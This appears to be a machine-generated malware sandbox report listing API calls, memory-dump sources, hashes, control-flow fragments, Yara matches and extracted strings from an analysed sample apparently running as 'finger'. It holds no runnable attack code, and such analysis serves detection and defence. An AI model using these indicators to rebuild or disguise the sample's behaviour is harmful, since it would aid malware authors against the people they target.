                                                              • Instruction Fuzzy Hash: 9590043531141C43D100F15C4404F470015C7F0301F55C017F1134754DC715CDD17531
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a6ffbd81d2ed850a923c1f34e5a906787be592316325b3cc7196e07b40670a0d
                                                              • Instruction ID: 65561b1897da6c2b74b43fbd829d9eda5e2cb63ba1e6752c2b3ab3e17f3a5831
                                                              • Opcode Fuzzy Hash: a6ffbd81d2ed850a923c1f34e5a906787be592316325b3cc7196e07b40670a0d
                                                              • Instruction Fuzzy Hash: 1A90023521149C02D110B158840474A001587D0301F59C411A5424658D879589D17121
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bd1d037e5aeae7a90df1b0f41cd19eb3dcb8a32c70c5cf1ea79f2121ff588bea
                                                              • Instruction ID: 77d4324e3d78e70afdff5ab4b4a16398eb4a6b8452091ebd3538affc08b3e2cf
                                                              • Opcode Fuzzy Hash: bd1d037e5aeae7a90df1b0f41cd19eb3dcb8a32c70c5cf1ea79f2121ff588bea
                                                              • Instruction Fuzzy Hash: C490023521141802D100B5985408646001587E0301F55D011A6024555EC76589D16131
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4414f32281f17e0c3068023cf6df64479c187941f5dbc85ad3038cafab1316b6
                                                              • Instruction ID: 9b3481a6262576aa0bfe2326a1dcfe5fc1e7ac002d854d45d7f07c44bf944490
                                                              • Opcode Fuzzy Hash: 4414f32281f17e0c3068023cf6df64479c187941f5dbc85ad3038cafab1316b6
                                                              • Instruction Fuzzy Hash: E690023561551802D100B1584514706101587D0201F65C411A1424568D87958A9165A2
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4175aa7ea41ad7c634b23457375d8fb4253b7f049e70a82788b3a421a64a750a
                                                              • Instruction ID: 16c2c80118fbf208e03a801c5707bc193d1c122dbd2bf868395471aad8c36b83
                                                              • Opcode Fuzzy Hash: 4175aa7ea41ad7c634b23457375d8fb4253b7f049e70a82788b3a421a64a750a
                                                              • Instruction Fuzzy Hash: 5690022525546502D150B15C44046164015A7E0201F55C021A1814594D865589956221

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 02940FED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                              • API String ID: 1836367815-1005098266
                                                              • Opcode ID: 62ac509af513badd59f52ff932e67a1d51426ef96a03da2f40b57a8547a2cddc
                                                              • Instruction ID: 9c639fb097a2bb8dc1b7e03aacffe2f28737315e119a83c2bb3af932574c732d
                                                              • Opcode Fuzzy Hash: 62ac509af513badd59f52ff932e67a1d51426ef96a03da2f40b57a8547a2cddc
                                                              • Instruction Fuzzy Hash: F101F932E4125876EB11D690AC41FEEBB6C9F81758F008195FF18BB290DAB569028BD5

                                                              Control-flow Graph

                                                              control_flow_graph 518 2940f69-2940f80 520 2940f89-2940fde call 295c170 call 2944700 call 29313e0 call 2951e40 518->520 521 2940f84 call 295b760 518->521 530 2941000-2941005 520->530 531 2940fe0-2940ff1 PostThreadMessageW 520->531 521->520 531->530 532 2940ff3-2940ffd 531->532 532->530
                                                              APIs
                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 02940FED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                              • API String ID: 1836367815-1005098266
                                                              • Opcode ID: 97573ca473f30ff0083e82b3b7025720e141c8b42e374edf9a4bd21b38e2e68e
                                                              • Instruction ID: ec763da7fc977a15663f550fe5442935c246f7c4bb219752a3536190c6c34e24
                                                              • Opcode Fuzzy Hash: 97573ca473f30ff0083e82b3b7025720e141c8b42e374edf9a4bd21b38e2e68e
                                                              • Instruction Fuzzy Hash: 7E118871E41358B6EB21D6A09C41FDF7F7C9F81B94F148055FA04BB2C0DAB466068BE5

                                                              Control-flow Graph

                                                              control_flow_graph 533 2940f70-2940f80 534 2940f89-2940fde call 295c170 call 2944700 call 29313e0 call 2951e40 533->534 535 2940f84 call 295b760 533->535 544 2941000-2941005 534->544 545 2940fe0-2940ff1 PostThreadMessageW 534->545 535->534 545->544 546 2940ff3-2940ffd 545->546 546->544
                                                              APIs
                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 02940FED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                              • API String ID: 1836367815-1005098266
                                                              • Opcode ID: 5b2c7bf13fbc1386b4dce6a31997c1ee6d6986f9ba4028ad4039b86e24a1e116
                                                              • Instruction ID: 989647317b36f8d3580dbc0a6fbaceab2a243d38b7c09a83081f52c21e96f45d
                                                              • Opcode Fuzzy Hash: 5b2c7bf13fbc1386b4dce6a31997c1ee6d6986f9ba4028ad4039b86e24a1e116
                                                              • Instruction Fuzzy Hash: 21019B71E4135876EB21D6909C41FDF7F7C9F81B94F148055FE047B280D6B466068BE5
                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 02953D4D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              • Opcode ID: 9685e4fba9fc834a698779fa1371a8dd9465bdcaa9f451465d72ec142213eb0f
                                                              • Instruction ID: cc38aef40b383ee565a0d5b30e32773ff939f63b9513c21cfde8e922d9695965
                                                              • Opcode Fuzzy Hash: 9685e4fba9fc834a698779fa1371a8dd9465bdcaa9f451465d72ec142213eb0f
                                                              • Instruction Fuzzy Hash: AA316CB1A01305BBDB14DFA4C880FEAB7B9FF84754F04815CEA59AB244D770AA00CBA4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: 9c88c4023dbabb63ce3517aee62a2f75d88881334ea293935199495fb9da40bb
                                                              • Instruction ID: 51b951891602de733d074cd379a16bd2a984ab265086c45eb180d7f4e4866961
                                                              • Opcode Fuzzy Hash: 9c88c4023dbabb63ce3517aee62a2f75d88881334ea293935199495fb9da40bb
                                                              • Instruction Fuzzy Hash: DD3141B5A0060A9FDB10DFD8C880DEFB7B9FF88304B108559E905E7204DB75EA05CBA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: b93f0931f0eea652ec0d38269af57df06c3462037f8469147fee7db7124a2835
                                                              • Instruction ID: 367b4216bd3d808291af07ba88b5aeee137747fb73577dbf1da337b53426e6dd
                                                              • Opcode Fuzzy Hash: b93f0931f0eea652ec0d38269af57df06c3462037f8469147fee7db7124a2835
                                                              • Instruction Fuzzy Hash: 50310FB5A0060A9FDB00DFD8D880DEFB7B9BF88304B108559E915AB214DB75EE45CBA0
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02944772
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                              • Instruction ID: f67ded027f6416a2711b1d7aed9d721ca9e8ab22e9301519acde3b98ec63a78d
                                                              • Opcode Fuzzy Hash: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                              • Instruction Fuzzy Hash: A2011EB5E0020DBBDB10EBE4DC41F9DB3B99B44308F004195AD0897240FA71E715CB91
                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,029484CE,00000010,?,?,?,00000044,?,00000010,029484CE,?,00000000,?), ref: 02959A60
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: 3473fbc84f5de4e9ef638430524f151b17afe93dbc7687943e0913540f186df8
                                                              • Instruction ID: 2a93ea33eb52e33431749566b22c09b7105a86dd66c0f66493e2977a68ebdfe6
                                                              • Opcode Fuzzy Hash: 3473fbc84f5de4e9ef638430524f151b17afe93dbc7687943e0913540f186df8
                                                              • Instruction Fuzzy Hash: 540180B2215108BBDB44DE99DC81EDB77AEAF8C754F408208BA1DA3240D630F9518BA4
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02939F05
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: db92189fec3a812eea8a9a67e111a15204625a2f2668b3669d1839d2361ad85c
                                                              • Instruction ID: 33ef64138757e97978eef6264e4540878f02926359f74480cadb2758f172d1cd
                                                              • Opcode Fuzzy Hash: db92189fec3a812eea8a9a67e111a15204625a2f2668b3669d1839d2361ad85c
                                                              • Instruction Fuzzy Hash: 45F0E57374031436E621A5A99C02FDB765DCBC4765F150425FB0DEA1C0D5A6B50147E9
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02939F05
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: eb2a8d7799c11fcc7e0d595a5d483ba23fad3cd631e5b665474ae8614d04f02a
                                                              • Instruction ID: b3570ba4203a00fc8ca45efb81085d24902bdf34be74f9b8a9ffee424500d8d5
                                                              • Opcode Fuzzy Hash: eb2a8d7799c11fcc7e0d595a5d483ba23fad3cd631e5b665474ae8614d04f02a
                                                              • Instruction Fuzzy Hash: 31F06D7334031037E232A6AA8C02FCB76ADCFC1B50F140019FB0CAA2C0D9A2B80087F8
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F84D8BFF,00000007,00000000,00000004,00000000,02943F8F,000000F4), ref: 029599B9
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                              • Instruction ID: 91a9d0e34b7b81da26b02aa54402cbed1ac26e2f97d5b8cd1bbf017d5b9993f5
                                                              • Opcode Fuzzy Hash: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                              • Instruction Fuzzy Hash: 74E065B2200214BBDA10EE59DC41EAB37AEEFC9710F004009FE09A7241C670B8118BB8
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(02941C06,?,0295587B,02941C06,0295586F,0295587B,?,02941C06,0295586F,00001000,?,?,00000000), ref: 02959979
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                              • Instruction ID: eed3ed912a9bf669601ba6020767faa25292d60e091ee410dcd1194ad220cd55
                                                              • Opcode Fuzzy Hash: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                              • Instruction Fuzzy Hash: D2E065722042047BDA10EE69EC45E9B37AEEFC9710F008009FA1CA7240DA31B8518BB8
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0294853C
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 78caaeef33826840504e2043f515a6604d6ca5fe9c1b0a4c19f806850eb8d1c5
                                                              • Instruction ID: 6c8337d27dc8fdcb021ca4fe6c8922e954a7c3832af80cd739181be680f56d23
                                                              • Opcode Fuzzy Hash: 78caaeef33826840504e2043f515a6604d6ca5fe9c1b0a4c19f806850eb8d1c5
                                                              • Instruction Fuzzy Hash: FAE0867165430427EB34AAA8DD45F66335DAB48B38F1846A0FD1DDB2C1EA78F5014254
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0294853C
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 7b8680feeee384a9cde1c08f30642674778f21929240871f497dd4e73621c6e0
                                                              • Instruction ID: f9bbe1f96c346b1fb233dc3a4515b86c198001f52f4fa8f9fde6d96329853f2e
                                                              • Opcode Fuzzy Hash: 7b8680feeee384a9cde1c08f30642674778f21929240871f497dd4e73621c6e0
                                                              • Instruction Fuzzy Hash: EFE026B690430027E73066649F46BAA321D6B00B38F280AA4F82D9B1C3E63CD1024324
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02941EF0,029581AF,0295586F,02941EC0), ref: 02948333
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 47f843362389e76ecdee1559b75256e8c3984728e288a0686686b97d3bef1785
                                                              • Instruction ID: a498ead3959273f69440f271d81d43ad47e685e1912ce344e09a5f9e36b88707
                                                              • Opcode Fuzzy Hash: 47f843362389e76ecdee1559b75256e8c3984728e288a0686686b97d3bef1785
                                                              • Instruction Fuzzy Hash: 27D05E723403053BEA01F6E4DC06F96328D9B40798F050074FA0CD62C1E9A8F1004669
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 653f4e06591d11760d6120308dd458cdc5f74af797fb565bf0e797b023dec1ab
                                                              • Instruction ID: 1b009a86b3a40b5299e906354fa56bcc20b3d156ff5bff9d73d48deed4e6ab88
                                                              • Opcode Fuzzy Hash: 653f4e06591d11760d6120308dd458cdc5f74af797fb565bf0e797b023dec1ab
                                                              • Instruction Fuzzy Hash: ACB09B719115D5C5DE11E7604A08717791467D0701F1AC565D3030641E4739C5D1E175
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3141304255.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_35a0000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa4e9dff2f25cf6ba25235a48aeeac25dcf03243747be0d05e8712814ae51cb3
                                                              • Instruction ID: c0ab91c4cb4e4084d76767fee38806103c20e96313e73d9d2a458df7f6ef2841
                                                              • Opcode Fuzzy Hash: fa4e9dff2f25cf6ba25235a48aeeac25dcf03243747be0d05e8712814ae51cb3
                                                              • Instruction Fuzzy Hash: EB41B77561CF0D4FD368EF6CE08167AB3F1FB89310F54052DD98AC72A2E670D8468685
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0865ff5424ecf9e77f91489767588841e59a8d48a04142e8af4d6f55970ecbfe
                                                              • Instruction ID: d3d539581343e5142ad3ad3cf6bc3a0fcff224ea494eead0084f88fe096c1baf
                                                              • Opcode Fuzzy Hash: 0865ff5424ecf9e77f91489767588841e59a8d48a04142e8af4d6f55970ecbfe
                                                              • Instruction Fuzzy Hash: CCC08033E6041591D3148D5CFC817F0F3E4D797325F047356D514D3144C11AF45146D6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3141304255.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_35a0000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                              • API String ID: 0-3558027158
                                                              • Opcode ID: 5a96c6284389f62c30a2dd4d636429b92f6a6b2938730354730b7adc21228ec2
                                                              • Instruction ID: d8509279a86f6eae2d195912bbfab70964e5d831018242874d0e3db52dc4a465
                                                              • Opcode Fuzzy Hash: 5a96c6284389f62c30a2dd4d636429b92f6a6b2938730354730b7adc21228ec2
                                                              • Instruction Fuzzy Hash: 8A9162F04482948AC7158F59A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8905DB85
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3141304255.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_35a0000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: -nu$ <91$434'$80zf$994z$9<>0$:<1u$;x &$<:;z$<z`f$>:|u$`{eu$anu0$a{a{$a{e{$b{fc$dmab$g{eu$z`fb${bcu${fcu
                                                              • API String ID: 0-2065742749
                                                              • Opcode ID: 9ae20cf4b4557e0ac6225483ce40d05f002ddf7f1f7b9f4d55118934c447bddd
                                                              • Instruction ID: 1718c6b74ce9ce2c176e4c5fb22ea75dd2e8ca8cfd000cd78d35495defbfa372
                                                              • Opcode Fuzzy Hash: 9ae20cf4b4557e0ac6225483ce40d05f002ddf7f1f7b9f4d55118934c447bddd
                                                              • Instruction Fuzzy Hash: 1241F2B480478CEBCF18CF85E5416DEBB71FF05394F904159E9096F294C7758616CB89
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 878b8b497aae63c76d819fea03c36172c316ec815c054703d376c80f2051fb0f
                                                              • Instruction ID: 5dd81b47c92b7d01faec2a3bc89d8580878746c7aad80b91430ac9947cdf1fc4
                                                              • Opcode Fuzzy Hash: 878b8b497aae63c76d819fea03c36172c316ec815c054703d376c80f2051fb0f
                                                              • Instruction Fuzzy Hash: B551A7B6A30256BFCF10DB98989097EF7B8BB08201B14C76DE569D7641D674DE808BE0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 54f2311c93030bd06c575d0321fe28c2301c66b07d8a89aa79c767636902fa17
                                                              • Instruction ID: 4ecf198480d8af67bef4c426e4495925111178fc700716c6a78592ca9b769c42
                                                              • Opcode Fuzzy Hash: 54f2311c93030bd06c575d0321fe28c2301c66b07d8a89aa79c767636902fa17
                                                              • Instruction Fuzzy Hash: 2B5192B5A00645AEDB20DE9CCCD097FF7FDAF45200B48C859E596D7641E7B4EA8087A0
                                                              Strings
                                                              • ExecuteOptions, xrefs: 032F46A0
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 032F4725
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 032F4787
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032F46FC
                                                              • Execute=1, xrefs: 032F4713
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 032F4742
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 032F4655
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
